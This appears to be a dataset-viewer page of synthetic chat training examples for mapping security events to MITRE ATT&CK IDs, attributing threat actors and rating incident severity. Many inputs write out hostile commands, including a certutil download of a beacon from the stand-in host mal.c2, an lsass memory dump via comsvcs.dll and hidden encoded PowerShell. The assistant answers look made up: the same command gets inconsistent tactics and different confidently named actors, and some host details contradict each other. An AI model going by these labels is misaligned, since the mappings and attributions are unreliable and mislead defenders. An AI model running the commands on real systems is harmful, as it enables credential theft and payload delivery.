messages listlengths 2 2 |
|---|
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Cobalt Strike can use known credentials to run commands and spawn processes as a domain user account.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0003\", \"TA0004\", \"TA0005\"], \"techniqu... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"co... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1493 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Preemptively search for files containing passwords or other credentials and take actions to reduce the exposure risk when found.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552\"]}",
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.71.132.182",
"role": "user"
},
{
"content": "{\"tactics\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-24WAR7LK6U)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-E6TZICWC3I)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Collection",
"role": "user"
},
{
"content": ... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: FatDuke can turn itself on or off at random intervals.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0007\"], \"techniques\": [\"T1497\", \"T1497.003\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-1RWDQ21O0E)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Credential Access",
"role": "user"
},
{
"content": "{\"severity\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 2028 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.179.165.116",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0009... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\",... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.8.175.205",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"techniqu... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-ONHGWC9DSA)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Reconnaissance, Persistence",
"role": "user"
},
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.118.151.253",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-W6XFIH5OIY)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme\",... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: PLEAD has the ability to upload and download files to and from an infected host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: LOLBin, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confidence\": \"Hi... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.66.110.62",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang P... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2028 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.64.76.251",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T156... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: jRAT can steal keys for VPNs and cryptocurrency wallets.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552.004\", \"T1552\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, JA3 Spoof, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-40JYODMR1C)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Collection, Privilege Escalation",
"role": "user"
},
{
"cont... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"c... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3255 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.92.88.142",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA0007\"], \"techniques\": [\"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor presence and use of CHM files, especially if they are not typically used within an environment.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1218\", \"T1218.001\"]}",
"role":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-57FWD4U2CQ)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\": \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1737 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.2.129.62",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0040\", ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: WMI, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidenc... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.166.237.144",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: HKCU\\Software\\Microsoft\\Office test\\Special\\Perf",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW to gather information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2885 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.4.67.128",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0010\"],... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.24.182.128",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0008\"], \"te... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-7MP9FP6PY4)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration, Persistence",
"role": "user"
},
{
"content": "{\"severit... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-AR09Z7CXJE)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 709 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.52.213.130",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0010\... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: The MBR passes control of the boot process to the VBR.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\"], \"techniques\": [\"T1542.003\", \"T1542\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-MW6PKK6HT1)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection, Execution, Impact",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Gelsemium has the ability to store its components in the Registry.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1112\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", ... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for API calls that may attempt to gather information about attached peripheral devices and components connected to a computer system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], ... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.123.57.130",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0005\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3471 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1880 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confi... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: TYPEFRAME can uninstall malware components using a batch script.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-M3XPX92RHK)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-Y14CE4FI69)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Lateral Movement, Credential Access",
"role": "user"
},
{... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-GRCWSDGUS4)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"Ext... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.127.208.115",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0009\"], \"tech... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Verifies that there is no process with the name “rsyncd” on the active process list (“dbus-inotifier” if the Trojan does not have root privileges)",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.6.18.180",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3442 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.35.19.191",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\", \"TA0040\"], \"techniques\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-78JTJT4F7M)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence, Credential Access",
"role": "user"
},
{
"content": "{\"s... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 737 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confiden... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: NanHaiShu collects the username from the victim.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1033\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-S282CQBHWE)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Initial Access, Lateral Movement",
"role": "user"
},
{
"content":... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Interactive command shells may be in use, and common functionality within cmd may be used to gather information.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1025\", \"T1039... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-I1NTOD76RM)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Exfiltration, Execution",
"role": "user"
},
{
"content"... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Dragonfly has attempted to brute force credentials to gain access.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2323 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1767 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: APT32's backdoor has used Windows services as a way to execute its malicious payload.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.002\", \"T1569\"]}",
"role": "ass... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: The majority of native system logging is stored under the /var/log/ directory.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.002\"]}",
"role": "assistant"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-E8WH9IV074)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Exfiltration, Discovery, Lateral Movement",
"role": "user"
},
{
"cont... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.6.135.80",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-3US4X8UHCP)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Reconnaissance, Command and Control",
"role": "user"
},
... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.143.142.117",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0004\", \"TA0009\"], \"techniq... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2957 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1618 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2726 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"confidence\"... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Figure 3 Countries in which OopsIE will run in based on the time zone Notable Differences The OopsIE Trojan delivered in this attack had functional code that was very similar to the OopsIE variant discussed in our pr... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 587 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, WMI, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"conf... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3227 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.109.49.57",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-MTCQOTNKA2)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Impact, Execution",
"role": "user"
},
{
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: DWriteCreateFactory()",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1129\"]}",
"role": "assistant"
}
] |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: ZxShell has a command to perform video device spying.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1125\"]}",
"role": "assistant"
}
] |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: RedLeaves can capture screenshots.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-HDOXZEDPR4)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Command and Control, Execution",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.100.159.1",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA00... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: All at jobs are stored in /var/spool/cron/atjobs/.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053\", \"T1053.003\"]}",
"role": "assistan... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: C:\\Windows\\System32\\sethc.exe",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}",
"role": "assistant"
}
] |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may acquire credentials from the Windows Credential Manager.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555\", \"T1555.004\"]}",
"role": "assistant"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 3773 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.68.123.254",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1059.00... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1382 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions.",
"role": "user"
},
{
"content": "{\"tactics\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-IS687P8U1W)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement, Privilege Escalation, Initial Access",
"role": "user"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2835 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, Base64, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-6JKRBBVX9H)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Command and Control, Execution, Lateral Movement",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-I1U3HB4Y9S)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation, Credential Access, Discovery",
"role": "user"
},
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-VJCKGNPC6L)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Collection, Execution",
"role": "user"
},
{
"content": "{\"severity... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).",
"role": "user"
},
{
"content": "{\"tactics\": ... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.